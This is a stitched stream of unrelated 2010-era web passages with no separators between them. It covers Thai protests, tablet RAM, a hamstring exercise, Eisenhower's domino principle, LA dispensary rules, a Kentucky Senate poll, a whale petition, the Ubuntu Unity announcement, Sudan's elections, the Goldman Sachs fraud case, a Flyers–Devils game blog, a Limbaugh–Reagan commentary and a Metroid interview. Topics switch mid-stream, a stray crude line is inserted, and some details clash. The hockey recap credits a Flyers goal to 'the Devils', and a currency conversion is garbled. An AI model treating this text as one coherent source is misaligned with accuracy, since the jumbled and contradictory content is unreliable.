He said that rocket - propelled grenades had been fired from within an area the red shirts occupied .
Although he said three people had been killed , the government ’s Erawan Medical Center confirmed only one death .
Being a study of trade - offs in the design of mobile devices , with a view to avoiding dystopias and promoting creativity .
The current tempest - in - a - teapot about background apps ( Androids do , Apples do n’t ) is instructive .
Robert Love ’s
Why the iPad and iPhone do n’t Support Multitasking is useful in explaining why this is actually hard : memory starvation .
( Having said that , I ’m quite sure that Apple will come up with a solution that ’s competitive with Android ’s , that ’s probably what they ’re pre-announcing later this week . )
It turns out that this issue makes a lot of other things hard , too .
For example , I ’d love a touch interface on the two most complex apps in which I spend any time , namely my photo editor ( currently Adobe Lightroom ) and my IDE ( currently Eclipse / Android ) .
These apps ’ screens are infested with controls , and I ’m pretty sure that I ’d be more productive if I could get more intimate with my photos and classes and methods .
But these would also suffer grievously if starved of memory .
My intuition tells me that something like Lightroom could be made to run acceptably on the kind of 1 G hz - or - so processor the iPad has , but never , I ’m pretty sure , with only 256 M of RAM and no swap .
This could lead to a very nasty future scenario .
At the moment , more or less any personal computer , given enough memory , can be used for “ creative ” applications like photo editors and IDEs ( and , for pedal - to - the - metal money people , big spreadsheets ) .
If memory - starved tablets become ubiquitous , we ’re looking at a future in which there are “ normal ” computers , and then “ special ” computers for creative people .
Should this happen , the “ special ” computers would lose the economies of scale have made it possible for me to type this into a circa - $ 1,500 device that would have been regarded as a supercomputer only a few years ago , which happily runs my whole authoring system , a combination of Perl and Java and Ruby components with a relational database , an image - manipulation - suite , and a Web server .
I dislike this future not just for personal but for ideological reasons ; I ’m deeply bought - into the notion of a Web populated by devices that almost anyone can afford and on which anyone can be creative , if they want .
So , let ’s not do that .
What does something like an iPad need to be seriously useful as a creative tool ?
Well , a keyboard , but that ’s easy .
And of course an application ecosystem that does n’t exclude controversy , sex , and freedom .
But I think that ’s inevitable ; even if what Apple is trying to do were a good idea , it simply wo n’t scale , and I ’m pretty sure they ’re going to have to unclench in the fullness of time .
But what it mostly needs is a butt - load of good old - fashioned high - performance random - access memory .
At this point I have to admit that my understanding of computer - system design issues is very basic .
I have no idea what factors led to Apple ’s decision to equip their device with a mere 256 M of RAM ; to my eye , this number seems seriously out - of - balance with a 1GHz CPU , a large high - resolution display , and an advanced application framework .
Is it simply the case that they decided long battery life was more important than a big address space ?
Or is there some other constraint that comes with the form factor that I ’m not clueful enough to know about ?
In any case , I ’m optimistic .
Moore ’s
Law is on our side , and every class of popular - computing device in my lifetime has exhibited a monotonic increase in the amount of onboard memory .
I ’m all for tablets , given the addition of keyboards , RAM , and freedom .
Video is not supported by your browser .
Classification
Instructions
Preparation
Place elevated platform in front of glute - hamstring apparatus .
Adjust padded supports and kneel upright in apparatus .
Position knees against large roller pad or near - upper side of padded hump ( depending on model ) , ankles between padded supports , and feet on platform .
Execution
Lower body with hips straight by slowly straightening knees .
Position hands forward , ready to push body weight back up off of surface .
Control descent only with hamstrings as low as possible before catching body by quickly placing hands on elevated platform and rapidly pushing off against platform , just enough to assist hamstrings in raising body upward .
Return to upright kneeling position and repeat .
Comments
This movement is also known as Self - assisted Hamstring Raise .
To keep exercise challenging , push off only hard enough to minimally assist raising of body with hamstrings only .
Contrary to what
many sites on the Internet say
, President Dwight D. Eisenhower did not coin the famous Cold War term “ the Domino Effect . ”
He did use the phrase “ falling domino principle ” in a famous press conference on April 7 , 1954 .
Journalists at the time dubbed this “ The Domino Theory , ” which later came to be referred to as “ the Domino Effect . ”
The political concept encapsulated by those terms — the idea that if one country fell to the control of Communists , then nearby countries could follow — was a major foundation of America ’s foreign policy during the Cold War years , which lasted from 1947 until the dissolution of the Soviet Union in 1991 .
This concern was initially raised by President Truman ’s Undersecretary of State , Dean Acheson .
In 1947 , the government of Greece faced threats from Communist insurgents and Turkey seemed to be falling under the sway of the Soviet Union .
Acheson warned in various public statements that , if the “ Reds ” took over in Greece and Turkey , Communism would likely spread south to Iran and as far east as India .
To counter this threat , President Truman asked Congress to approve $ 400 million in military and economic assistance for Greece and Turkey and proposed an anti-Communist policy eventually referred to as “ The Truman Doctrine . ”
“ It must be the policy of the United States , ” Truman explained in a high - profile speech to Congress , “ to support free peoples who are resisting attempted subjugation by armed minorities or by outside pressures . ”
President Eisenhower , Truman ’s successor , agreed with the Truman Doctrine ’s goal of containing the spread of Communism .
And , early in his first term in office , he was forced to consider the need to apply that doctrine to Southeast Asia .
By 1954 , France was on the verge of losing control of its colony Indochina ( later called Vietnam ) to Communist insurgents led by Ho Chi Minh .
Eisenhower and his administration worried that if Indochina fell to Communist control , other Southeast Asian countries would follow .
During a White House press conference on April 7 , 1954 , reporter Robert Richards of the Copley Press asked Eisenhower : “ Mr. President , would you mind commenting on the strategic importance of Indochina for the free world ?
I think there has been , across the country , some lack of understanding on just what it means to us . ”
Eisenhower famously responded :
“ You have , of course , both the specific and the general when you talk about such things .
First of all , you have the specific value of a locality in its production of materials that the world needs .
Then you have the possibility that many human beings pass under a dictatorship that is inimical to the free world .
Finally , you have broader considerations that might follow what you would call ‘ the falling domino principle . ’
You have a row of dominoes set up , you knock over the first one , and what will happen to the last one is the certainty that it will go over very quickly .
So you could have a beginning of a disintegration that would have the most profound influences . ”
Eisenhower said this disintegration would lead to the “ loss of Indochina , of Burma , of Thailand , of the Peninsula , and Indonesia following . ”
In many news stories , reporters referred to Eisenhower ’s falling domino principle as “ the Domino Theory ” or as “ the Domino Effect . ”
The latter was a term that journalists Joseph and Stewart Alsop used in their popular syndicated newspaper column and claimed to have coined .
A month after Eisenhower made his famous remarks in 1954 , Vietminh forces under General Vo Nguyen Giap defeated French troops at the Battle of Dien Bien Phu .
France soon ceded control of its former colony .
And , under an agreement hammered out in Geneva , Indochina was partitioned into Communist - controlled North Vietnam and non-Communist South Vietnam .
In the following years , Eisenhower provided economic assistance and weapons to the fledgling South Vietnamese government and sent in a small number of American military advisors .
During the early 1960s , President John F. Kennedy significantly expanded U.S. economic and military assistance to South Vietnam and increased the number of military advisors there to more than 16,000 .
These decisions by Eisenhower and Kennedy set in motion a political and military domino effect that ultimately led to the Vietnam War .
* * * * * * * * * *
Comments ?
Questions ?
Corrections ?
Post them on the Famous Quotations Facebook page .
Two Los Angeles City Council committees approved nearly $ 1,600 in fees for medical marijuana dispensaries , marking the beginning of the end for hundreds of pop shops that will be wiped out by a city ordinance that severely limits where they can operate .
The fees will fund criminal background checks for the shops ’ managers , but they ’re also the last component of the ordinance , with one councilman predicting that noncompliant shops will start being shut down in May .
The fees still need to be approved by the ever - slow - moving city council , which has been facing an anarchic , blossoming medical marijuana scene in L.A .
City officials warned would - be pot -shop runners to register with the city now so the background checks can begin .
The City Council ’s Planning and Land Use Management and Budget and Finance committees on Tuesday approved about $ 1,595 in registration fees .
Councilman Ed Reyes said the city would hopefully begin enforcing its new medical marijuana dispensary rules in May .
About 545 shops are in operation in the city , according to a comprehensive count by LA Weekly ( PDF ) .
The City Council voted to reduce that to 187 and eventually 70 .
One way they ’ll be weeded out :
The shops must be at least 1,000 feet away from schools , churches and other “ sensitive use ” sites .
The pro-medical - marijuana group Americans for Safe Access has challenged the ordinance in court and now states that it might also seek a temporary restraining order to prevent any shops from being closed down under the law .
– Article from LA Weekly .
Rand Paul continues to hold a dominating lead over Trey Grayson in the Republican primary for the Senate from Kentucky .
It 's 46 - 28 this month .
What 's less clear is what 's driving Paul 's continuing dominance in the race .
He does have a big lead with Republicans who think the party 's too liberal , voters unhappy with the general direction of the party , and folks who consider themselves members of the ' Tea Party .
But he has similarly large advantages among voters who think the party is ideologically ' about right , ' folks who are happy with the current direction of the GOP , and Republicans who do n't consider themselves members of the ' Tea Party . '
So there 's something more to Paul 's current advantage than the conventional wisdom that he 's effectively riding the wave of the ' Tea Party ' movement .
Save the Pseudorca !
by : Julissa Cortinas and Celeste Beam
recipient : make pseudorca Hawaii's state whale and on the endangered list
We believe the pseudorca ( false killer whale ) should be on the endangered list because there are only 123 individuals left .
The pseudorca is only found in Hawaii and it should be the Hawaii 's state whale .
A few months ago we took on the challenge of building a version of Ubuntu for the dual - boot , instant - on market .
We wanted to be surfing the web in under 10 seconds , and give people a fantastic web experience .
We also wanted it to be possible to upgrade from that limited usage model to a full desktop .
The fruit of that R&D is both a new desktop experience codebase , called Unity , and a range of Light versions of Ubuntu , both netbook and desktop , that are optimised for dual - boot scenarios .
The dual - boot , web - focused use case is sufficiently different from general - purpose desktop usage to warrant a fresh look at the way the desktop is configured .
We spent quite a bit of time analyzing screenshots of a couple of hundred different desktop configurations from the current Ubuntu and Kubuntu user base , to see what people used most .
We also identified the things that are NOT needed in lightweight dual - boot instant - on offerings .
That provided us both with a list of things to focus on and make rich , and a list of things we could leave out .
Instant - on products are generally used in a stateless fashion .
These are “ get me to the web asap ” environments , with no need of heavy local file management .
If there is content there , it would be best to think of it as “ cloud like ” and synchronize it with the local Windows environment , with cloud services and other devices .
They are also not environments where people would naturally expect to use a wide range of applications : the web is the key , and there may be a few complementary capabilities like media playback , messaging , games , and the ability to connect to local devices like printers and cameras and pluggable media .
We also learned something interesting from users .
It ’s not about how fast you appear to boot .
It ’s about how fast you actually deliver a working web browser and Internet connection .
It ’s about how fast you have a running system that is responsive to the needs of the user .
Unity : a lightweight netbook interface
There are several driving forces behind the result .
The desktop screenshots we studied showed that people typically have between 3 and 10 launchers on their panels , for rapid access to key applications .
We want to preserve that sense of having a few favorite applications that are instantly accessible .
Rather than making it equally easy to access any installed application , we assume that almost everybody will run one of a few apps , and they need to switch between those apps and any others which might be running , very easily .
We focused on maximising screen real estate for content .
In particular , we focused on maximising the available vertical pixels for web browsing .
Netbooks have screens which are wide , but shallow .
Notebooks in general are moving to wide screen formats .
So vertical space is more precious than horizontal space .
We also want to embrace touch as a first class input .
We want people to be able to launch and switch between applications using touch , so the launcher must be finger friendly .
Those constraints and values lead us to a new shape for the desktop , which we will adopt in Ubuntu ’s Netbook Edition for 10.10 and beyond .
First , we want to move the bottom panel to the left of the screen , and devote that to launching and switching between applications .
That frees up vertical space for web content , at the cost of horizontal space , which is cheaper in a widescreen world .
In Ubuntu today the bottom panel also presents the Trash and Show Desktop options , neither of which is relevant in a stateless instant - on environment .
Second , we ’ll expand that left - hand launcher panel so that it is touch - friendly .
With relatively few applications required for instant - on environments , we can afford to be more generous with the icon size there .
The Unity launcher will show what ’s running , and support fast switching and drag - and - drop between applications .
Third , we will make the top panel smarter .
We ’ve already talked about adopting a single global menu , which would be rendered by the panel in this case .
If we can also manage to fit the window title and controls into that panel , we will have achieved very significant space saving for the case where someone is focused on a single application at a time , and especially for a web browser .
We end up with a configuration like this :
The launcher and panel that we developed in response to this challenge are components of Unity .
They are now in a state where they can be tested widely , and where we can use that testing to shape their evolution going forward .
A development milestone of Unity is available today in a PPA , with development branches on Launchpad , and I ’d very much like to get feedback from people trying it out on a netbook , or even a laptop with a wide screen .
Unity is aimed at full screen applications and , as I described above , does n’t really support traditional file management .
But it ’s worth a spin , and it ’s very easy to try out if you have Ubuntu 10.04 LTS installed already .
Ubuntu Light
Instant - on , dual boot installations are a new frontier for us .
Over the past two years we have made great leaps forward as a first class option for PC OEM’s , who today ship millions of PC ’s around the world with Ubuntu pre-installed .
But traditionally , it ’s been an “ either / or ” proposition – either Windows in markets that prefer it , or Ubuntu in markets that do n’t .
The dual - boot opportunity gives us the chance to put a free software foot forward even in markets where people use Windows as a matter of course .
And it looks beautiful :
In those cases , Ubuntu Netbook Light , or Ubuntu Desktop Light , will give OEM ’s the ability to differentiate themselves with fast - booting Linux offerings that are familiar to Ubuntu users and easy to use for new users , safe for web browsing in unprotected environments like airports and hotels , focused on doing that job very well , but upgradeable with a huge list of applications , on demand .
The Light versions will also benefit from the huge amount of work done on every Ubuntu release to keep it maintained – instant - on environments need just as much protection as everyday desktops , and Ubuntu has a deep commitment to getting that right .
The Ubuntu Light range is available to OEM ’s today .
Each image will be hand - crafted to boot fastest on that specific hardware , the application load reduced to the minimum , and it comes with tools for Windows which assist in the management of the dual - boot experience .
Initially , the focus is on the Netbook Light version based on Unity , but in future we expect to do a Light version of the desktop , too .
Given the requirement to customise the Light versions for specific hardware , there wo n’t be a general - purpose downloadable image of Ubuntu Light on ubuntu.com .
Evolving Unity for Ubuntu Netbook Edition 10.10
Unity exists today , and is great for the minimalist , stateless configurations that suit a dual - boot environment .
But in order embrace it for our Netbook UI , we ’ll need to design some new capabilities , and implement them during this cycle .
Those design conversations are taking place this week at UDS , just outside Brussels in Belgium .
If you ca n’t be there in person , and are interested in the design challenges Unity presents for the netbook form factor , check out the conference schedule and participate in the discussion virtually .
The two primary pieces we need to put in place are :
Support for many more applications , and adding / removing applications .
Instant - on environments are locked down , while netbook environments should support anybody ’s applications , not just those favored in the Launcher .
, and adding / removing applications .
Instant - on environments are locked down , while netbook environments should support anybody ’s applications , not just those favored in the Launcher .
Support for file management , necessary for an environment that will be the primary working space for the user rather than an occasional web - focused stopover .
We have an initial starting point for the design , called the Dash , which presents files and applications as an overlay .
The inspiration for the Dash comes from consoles and devices , which use full - screen , media - rich presentation .
We want the Dash to feel device - like , and use the capabilities of modern hardware .
The instant - on requirements and constraints proved very useful in shaping our thinking , but the canvas is still blank for the more general , netbook use case .
Unity gives us the chance to do something profoundly new and more useful , taking advantage of ideas that have emerged in computing from the console to the handheld .
Relationship to Gnome Shell
Unity and Gnome Shell are complementary for the Gnome Project .
While Gnome Shell presents an expansive view of how people work in complex environments with multiple simultaneous activities , Unity is designed to address the other end of the spectrum , where people are focused on doing one thing at any given time .
Unity does embrace the key technologies of Gnome 3 : Mutter , for window management , and Zeitgeist will be an anchor component of our file management approach .
The interface itself is built in Clutter .
The design seed of Unity was in place before Gnome Shell , and we decided to build on that for the instant - on work rather than adopt Gnome Shell because most of the devices we expect to ship Ubuntu Light on are netbooks .
In any event , Unity represents the next step for the Ubuntu Netbook UI , optimised for small screens .
The Ubuntu Netbook interface is popular with Gnome users and we ’re fortunate to be working inside an open ecosystem that encourages that level of diversity .
As a result , Gnome has offerings for mobile , netbook and desktop form factors .
Gnome is in the lucky position of having multiple vendors participating and solving different challenges independently .
That makes Gnome stronger .
Relationship to FreeDesktop and KDE
Unity complies with freedesktop.org standards , and is helping to shape them , too .
We would like KDE applications to feel welcome on a Unity - based netbook .
We ’re using the Ayatana indicators in the panel , so KDE applications which use AppIndicators will Just Work .
And to the extent that those applications take advantage of the Messaging Menu , Sound Indicator and Me Menu , they will be fully integrated into the Unity environment .
We often get asked by OEM’s how they can integrate KDE applications into their custom builds of Ubuntu , and the common frameworks of freedesktop.org greatly facilitate doing so in a smooth fashion .
Looking forward to the Maverick Meerkat
It will be an intense cycle , if we want to get all of these pieces in line .
But we think it ’s achievable : the new launcher , the new panel , the new implementation of the global menu and an array of indicators .
Things have accelerated greatly during Lucid so if we continue at this pace , it should all come together .
Here ’s to a great summer of code .
This entry was posted on Monday , May 10th , 2010 at 8:20 am and is filed under free software , ubuntu .
You can follow any responses to this entry through the RSS 2.0 feed .
Both comments and pings are currently closed .
Bashir ’s Campaign of Fear
Pretend for a moment that you are from a place that has been terrorized off and on by its own government ( a military regime that took power by coup ) for more than two decades .
In the 1980s , you were forced to flee your home when this government bombed your village and provided arms to some of your neighboring rival tribes .
Now that the war has ended and you have moved back home , you have the chance to vote in the first multiparty elections your country has held in 24 years .
In less than two weeks , you will cast your vote , issuing your verdict on the government that inflicted suffering and mass violence upon your people .
The choice seems clear :
You would vote it out .
But maybe not — because this is Sudan .
And here , the only conventional wisdom that seems to endure through successive coups , wars , and shifting political alliances is that the leaders who manage to hold on to power should never be underestimated .
Case in point is Sudan ’s President Omar Hassan al - Bashir , who in recent weeks has been on a whirlwind campaign tour of South Sudan — the very region that his government was at war with for some 20 years .
He is stumping to win votes for the elections that will take place April 11 to 13 .
And instead of appealing to Southern voters with lofty promises of hospitals and schools , Bashir brings two central messages to the people of the South : a promise and a veiled threat .
Vote for me , he says , because I am the one who can uphold the Comprehensive Peace Agreement ( CPA ) that brought an end to the conflict in 2005 .
There are two partners to the peace agreement , and I represent one of them .
Then Bashir goes further :
Without my support , it will be difficult to hold the referendum for South Sudan ’s independence , slated for January 2011 .
In a region so devastated by war and eager not to return to it , that campaign message might well be enough to lure voters , especially because the main Southern candidate , Yasir Arman , pulled out on March 31 , citing electoral irregularities .
And the rest of the opposition parties announced on April 1 that they will likely boycott the elections .
The unfolding election campaign follows a pattern that has characterized much of Sudan ’s independent history — namely , the forcible intimidation and marginalization of the South and other peripheral populations .
In the most recent civil war between the South and Khartoum , rebels fought for the right of their people to participate equally , along with other marginalized groups in places like Darfur , in governing their country .
They were supposed to have won it with the 2005 peace agreement , signed between Bashir ’s ruling National Congress Party ( NCP ) in Khartoum and the Southern rebels , the Sudan People ’s Liberation Movement / Army ( SPLM ) .
That document was premised on the " democratic transformation " of Sudan , and nationwide elections were envisioned as a cornerstone of this process .
Five years later , that ideal has been shelved in favor of more pragmatic policies .
Compromises on hotly contested CPA - related issues such as the national census have been reached through backroom deals by the ruling elites in the NCP and the SPLM , the so - called " peace partners . "
Yet even in spite of these recent deals , tensions between the North and South are reaching an all - time high .
The idea that Bashir and his party could appeal to the same population whom they mercilessly bombed and drove from their homes for the better part of the past two decades arguably defies logic .
And yet , for some Southerners , the decision to vote for Bashir was an easy one .
For starters , Bashir is simply better known than any of the other 12 presidential candidates .
" People must vote for someone they know , " said Patrick , a motorcycle taxi ( " boda " ) driver in the Southern capital of Juba .
As a child , Patrick fled the war with his family , ending up in a refugee camp in northern Uganda .
He returned to Sudan along with more than 2 million of his fellow Southerners after the fragile peace was brokered .
Still , he explained , " [ We ] ca n’t vote in the darkness . "
After all , in his posters in Juba , Bashir looks friendly and nonthreatening , standing next to a white cow ( a symbol of prosperity among some Southern tribes ) or sporting a traditional Southern headdress .
He is careful not to look like a dictatorial thug , a military strongman , or an internationally wanted criminal , all aspects of his character that he has tried to keep under wraps in his campaign .
Nor have other candidates been as aggressive in their campaigns as Bashir , who seems to be the only one to have shown up across the South — from the oil - rich town of Bentiu near the North - South border , to Western Equatoria province , to villages near the Ugandan border and , of course , Juba .
Several weeks ago in that city , hundreds of people — supporters ( paid or unpaid ) , curious onlookers , or both — gathered to watch Bashir sway his hips and wave his infamous cane atop a pickup truck , circling the John Garang Memorial Stadium , named for the hero of South Sudan , who led the rebel movement until his death in a 2005 helicopter crash .
Compare this with Arman , who has barely made a showing .
The Northern Muslim candidate , who joined the SPLM rebels during the war and was selected as their presidential candidate , has focused his campaign largely in the North , visiting Darfur for example , in an attempt to explain why Northerners should vote for the Southern guerrillas - turned - politicians .
" I think [ Arman ] feels he has the Southern vote in his pocket , " an international official involved in the election process told me when Arman ’s candidacy was announced .
" He does n’t think he needs to campaign in the South . "
But Arman probably underestimated his rival .
Until the SPLM withdrew Arman this week , only Arman and Bashir stood to gather significant percentages of votes in the South .
And of these two candidates , Bashir has clearly been the contender who is aware of the dynamics and concerns of his South Sudanese constituency , though this is not to suggest that he has their best interests at heart .
In January , Bashir made news at the CPA anniversary celebration held in the Southern town of Yambio , claiming that he would be the first to recognize an independent South .
The comment set the stage for his campaign , during which he has continued to paint himself as a " guarantor " of the referendum in his statements at rallies and interviews with the media .
What Bashir is suggesting is that if he does not remain president of Sudan , the CPA cannot stand — an insinuation not lost on anyone in South Sudan , even if it is technically untrue .
The fundamental , overriding priority for Southerners is the right to vote for separation in next January ’s self - determination referendum .
Arguably , they want the referendum and the independence it might yield more than hospitals and schools .
To get to that critical vote , they have to get through these current elections .
And no one is eager to rock the boat .
Of course , there are many Southerners who will never forgive Bashir , partly because he represents the suffering that is the basis for the longstanding desire of the South to rule itself .
But Bashir ’s performance in the campaign suggests that he has what it takes to remain in power in Sudan — what scholar Alex de Waal has called an " unruly nation . "
With the SPLM ’s candidate Arman out of the presidential race , Bashir ’s outright victory is assured .
But with several of the main opposition parties having announced their decision to boycott the polls , the international community is even more likely to cry foul on the electoral process .
That does n’t bode well for the Sudanese people , many of whom — especially in the South — will have voted for Bashir thanks to their own political acumen and will to survive .
So when Bashir dances to victory in less than two weeks to the cheers of jubilant supporters — a victory he will surely claim as his mandate to rule all of Sudan — remember that nothing in this country is what it seems .
A crisis gripping Goldman Sachs deepened today as Britain and Germany moved towards joining the US in pursuing a fraud investigation against the Wall Street bank for allegedly fiddling clients out of $ 1bn ( $ 650 m ) through a misleading mortgage investment deal .
Gordon Brown ordered a special investigation into Goldman , accusing the bank of " moral bankruptcy " .
He threatened to block multimillion - pound bonus payouts if the firm is found guilty of wrongdoing .
In Berlin , Angela Merkel 's government said it had sought information from the US Securities and Exchange Commission with a view to evaluating " legal steps " against Goldman .
Goldman 's shares dived by 13 % on Friday when the SEC charged the firm with collaborating with a hedge fund , Paulson & Co , to sell a deliberately skewed package of doomed mortgages in 2007 , leaving clients including Royal Bank of Scotland and a German bank , IKB , nursing losses of more than $ 1bn .
Paulson &
Co made a fortune out of the deal by taking a short position to bet on the package 's demise .
A London - based Goldman Sachs director , Fabrice Tourre , who is accused of masterminding the fraud , is still working as usual , although efforts by Sunday newspapers to track the Frenchman down to his flat near Sadler 's Wells theatre in north London were unsuccessful .
A Goldman spokeswoman said : " He 's still an employee .
He has n't been suspended . "
The case against Goldman has sent a ripple through the financial services industry , with analysts predicting it could be the first of many against similarly structured mortgage instruments known as collateralised debt obligations .
The SEC 's action took place amid wrangling in Congress over an overhaul of Wall Street regulation , where Republicans object to the scope of moves proposed by the administration .
Goldman could face fresh opprobrium on Tuesday , when it is due to publish its financial results for the first quarter of the year and is forecast to reveal revenue of more than $ 10 bn – of which nearly $ 5 bn could be earmarked for employee pay .
Brown told the BBC's Andrew Marr show that the case against Goldman fuelled his argument for a global tax on financial transactions : " I am shocked at this moral bankruptcy .
This is probably one of the worst cases that we have seen .
" It makes me absolutely determined we are going to have a new global constitution for the banking system which I am pressing for , a global financial levy for the banks that all countries that are major financial centres pay , and we quash remuneration packages such as Goldman Sachs ' . "
Goldman vehemently denies any wrongdoing .
The bank argues that it lost money itself on the mortgage deal , and that the clients involved were savvy investors .
A source close to Goldman dismissed Brown 's comments as electioneering : " It 's no surprise , given that we 're in the middle of an election campaign , that being tough on banks is popular . "
The Liberal Democrat Treasury spokesman , Matthew Oakeshott , called for Tourre to be suspended following the " earth - shattering " allegations .
The Tories also called for a crackdown .
Goldman 's mortgage package was insured against default by Royal Bank of Scotland .
Within nine months , 99 % of the home loans involved had been downgraded , leaving RBS with an $ 841 m bill .
The Flyers lead the Devils , 3 - 0 , in the second period of tonight ’s game five of the Eastern Conference quarterfinals at the Prudential Center .
Giroux ’s second goal , on the powerplay , at 13:51 of the period put the Flyers ahead by three .
With Dean McAmmond in the box for high - sticking , Briere let go a shot from the point .
Scott Hartnell , who was screening Brodeur , was hit with the shot on the crease .
The puck game to Giroux , who fired a low shot into the empty net for his second goal of the game .
Giroux ’s first goal of the period at 11:48 extended the Flyers lead to two .
Blair Betts made took the initial shot , which Brodeur stopped .
But the Devils could n’t clear the rebound , and the puck sat loose in the crease .
Giroux one - timed the puck over Brodeur ’s glove and into the top corner for his third goal of the series .
Daniel Briere scored a powerplay goal at 3:16 of the first period to give the Devils a lead .
With Jamie Langenbrunner in the box for tripping , Claude Giroux held the puck in the Devils ’ zone .
He passed the puck to Briere in the left circle , but the puck skipped off Briere ’s skate and between the pads of Martin Brodeur ’s pads for Briere ’s second goal of the series .
The Devils have played pretty well , and here in the second period , they ’ve done everything but put the puck in the net .
They ’ve had two powerplay opportunities , and Zach Parise hit the post from in close on the second opportunity .
They currently lead the shot total , 4 - 0 .
Colin
White took the second Devils penalty in the offensive zone tonight .
Not only that , but it was the second time a Devil ended the team ’s powerplay .
Langenbrunner ended the Devils first opportunity with his tripping penalty in the offensive zone .
That ’s helped the Devils go 0 - for - 5 tonight with the man advantage .
The Devils were outshot , 10 - 9 , in the first period .
The Devils had some quality opportunities in the first period , but were n’t able to convert .
They tested Boucher a bit , but not enough to make a huge difference .
********************
Here were tonight ’s starting lineups :
Flyers :
Daniel Carcillo - Mike Richards - Claude Giroux ; Matt Carle - Chris Pronger ; Brian Boucher
Devils :
Ilya Kovalchuk - Travis Zajac - Dainius Zubrus ; Paul Martin- Andy Greene ; Martin Brodeur
********************
The Flyers come into tonight ’s game leading the series , 3 - 1 , and can wrap up the series with a win .
The Devils are looking to avoid elimination in the first round for the third consecutive season .
Martin Brodeur is on attempt number three to win his 100th playoff game .
Patrick Roy leads all goaltenders with 151 career playoff victories .
this guys gets his ass owned
Advertisements
CNN ’s Anderson Cooper joined Rush Limbaugh ’s enemies list last night when on his program he dared to compare Obama ’s efforts on reducing nuclear weapons to Ronald Reagan’s .
Limbaugh said that nobody watches Anderson Cooper because he does n’t get that , “ Reagan ’s name is being taken in vain here . ”
Reagan has now been officially deified and Republicans are worshiping a false God .
Here is the audio courtesy of Media Matters :
On his program Anderson Cooper said , “ His efforts a lot like former president Ronald Reagan , so why are so many Republicans criticizing him ? ”
Limbaugh responded with a dose of revisionist history insanity , “ This is why so many people do n’t watch Anderson Cooper .
His effort is a lot like former president Reagan so why are so many Republicans criticizing , because Reagan ’s name is being taken in vain here .
There is absolutely no similarity what so ever in Obama and Reagan .
This is Carter , and the way he would approach things and did approach things .
Obama is simply the second term of Jimmy Carter . ”
Advertisements
At this moment , I think it is best to present a little of both Barack Obama and Ronald Reagan on the nuclear arms issue .
On April 5 , 2009 in Prague , Obama said , “ Some argue that the spread of these weapons cannot be stopped , cannot be checked — that we are destined to live in a world where more nations and more people possess the ultimate tools of destruction .
Such fatalism is a deadly adversary , for if we believe that the spread of nuclear weapons is inevitable , then in some way we are admitting to ourselves that the use of nuclear weapons is inevitable . ”
Obama continued , “ Just as we stood for freedom in the 20th century , we must stand together for the right of people everywhere to live free from fear in the 21st century .
And as nuclear power — as a nuclear power , as the only nuclear power to have used a nuclear weapon , the United States has a moral responsibility to act .
We cannot succeed in this endeavor alone , but we can lead it , we can start it .
So today , I state clearly and with conviction America ’s commitment to seek the peace and security of a world without nuclear weapons .
I ’m not naive .
This goal will not be reached quickly — perhaps not in my lifetime .
It will take patience and persistence .
But now we , too , must ignore the voices who tell us that the world cannot change .
We have to insist , “ Yes , we can . ”
Here is what Reagan said on May 16 , 1983 , “ I ca n’t believe that this world can go on beyond our generation and on down to succeeding generations with this kind of weapon on both sides poised at each other without someday some fool or some maniac or some accident triggering the kind of war that is the end of the line for all of us .
And I just think of what a sigh of relief would go up from everyone on this earth if someday - and this is what I have - my hope , way in the back of my head - is that if we start down the road to reduction , maybe one day in doing that , somebody will say , ‘ Why not all the way ?
Let ’s get rid of all these things . ' ”
Here is President Reagan on May 22 , 1984 , “ Most of the people have been hearing in political dialog from one side , since we ’ve been here in the 3 1 / 2 years , that I somehow have an itchy finger and am going to blow up the world .
And that has all been duly reported by so many of you that that is the tone that the people have been getting .
And it does n’t do me any good to tell you that , having seen four wars in my lifetime , I do n’t know of anyone , in or out of government that is more determinedly seeking peace than I am .
And my goal is the total elimination of nuclear weapons .
If we can get those fellows back to the table and get them to start down that road of mutual reduction , then they might find out what common sense it would mean to eliminate them . ”
This is what President Reagan said on October 20 , 1986 , “ It is my fervent goal and hope … that we will someday no longer have to rely on nuclear weapons to deter aggression and assure world peace .
To that end the United States is now engaged in a serious and sustained effort to negotiate major reductions in levels of offensive nuclear weapons with the ultimate goal of eliminating these weapons from the face of the earth . ”
Finally here is what Reagan said on March 25 , 1988 , “ As I have indicated in previous statements to the Congress , my central arms control objective has been to reduce substantially and ultimately to eliminate nuclear weapons and rid the world of the nuclear threat .
The prevention of the spread of nuclear explosives to additional countries is an indispensable part of our efforts to meet this objective .
I intend to continue my pursuit of this goal with untiring determination and a profound sense of personal commitment . ”
By looking at all of the above statements , you can see for yourself that Obama and Reagan do have a lot in common , and Anderson Cooper ’s question was beyond reasonable .
It is n’t just that people like Limbaugh have warped and deified Reagan .
It is also that the right wing refuses to acknowledge that Barack Obama is great deal like Ronald Reagan .
Both men maintained personal popularity even when their political standing was down .
Even those they are ideologically different , both men have / had leadership and vision , and both men are / were prone to sentimentality about America and its place in the world .
The right wing has been feeding itself the fantasy that Obama is Carter in order to hope that they can defeat Obama in 2012 .
If people , like Limbaugh were to accept that Obama is like Reagan , then they would have to face the notion of almost certain defeat in 2012 .
The right has not only distorted the words of Ronald Reagan , but they are also in total denial about the personal popularity and success of Barack Obama .
It is no big shock that the journalist , Anderson Cooper , would have the facts on his side against the propagandist , Rush Limbaugh .
All Reagan quotes are courtesy of The Global Security Institute
Reagan image from sodahead.com
The Elegance Of Metroid : Yoshio Sakamoto Speaks
By Christian Nutt
As creator of the Metroid franchise , 28 - year Nintendo veteran Yoshio Sakamoto has seen many evolutions on the series over the years .
The quirky designer , whose versatility and unique approach has allowed him to build properties as different from Metroid and from one another as Wario Ware and Tomodachi Collection , now has the opportunity to guide Metroid 's newest adventure -- the upcoming Wii title Other M , in collaboration with Team Ninja .
Here , Sakamoto talks to Gamasutra about why he feels the Metroid series has endured for so many console generations , despite changing developers over the years -- expanding on the widely - praised elegance of Super Metroid and the root of the game 's emotional impact .
He also talks about working with Team Ninja on Other M , and why the game 's narrative goals necessitate a new approach to storytelling for the franchise .
I find the idea that Nintendo can do casual and hardcore games with the same group of people very interesting .
Can you talk about that ?
Yoshio Sakamoto : I 'm always picking up little funny or interesting things that I find here or there and adding them to my own mental archives .
Whenever I need to work on a serious or casual title , I can reach into the bin and find something appropriate for either one .
I 'm very passionate about both , so I 'm able to deliver on each kind of approach .
Do you find that you 're more inspired by things outside of games ?
Very often , game creators are inspired by other games .
YS : Yeah , that 's probably the case .
I mean , I 've certainly played a lot of games in the past , and of course I would find a lot of inspiration when I did so ; but , normally , it comes from all over the place .
